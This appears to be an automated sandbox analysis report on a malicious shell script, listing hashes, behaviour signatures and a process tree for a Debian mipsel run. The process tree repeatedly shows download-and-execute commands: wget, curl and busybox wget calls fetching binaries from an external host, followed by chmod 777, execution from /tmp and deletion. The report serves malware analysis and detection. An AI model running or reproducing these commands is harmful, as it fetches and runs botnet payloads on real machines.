Analysis
max time kernel: 120s
max time network: 118s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
submitted: 24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Resource
debian9-mipsel-20240611-en
General
Target: 304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
Size: 10KB
MD5: 212b02f29854addd09c83c096b0a28d8
SHA1: 6d3e25cbd8a8331cfec87e951c697876d1ce21c5
SHA256: 304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788
SHA512: 8ae72b9af1d4e17bda84c690db9c365158e62d7dcf4dae5a7f42a9edf5f1faae4b8955062fcadd5a6f40c68045060f91734e883bd234aa98d078149be0382a85
SSDEEP: 192:bZR+7fUY+OQy21N8fzFNEZR+7f2Y8D1N8fz8:7OQyPNAV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:786
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:793
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:840
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:843
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:844
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:850
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:851
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:857
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:858
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:917
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:931
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:1003
-
-
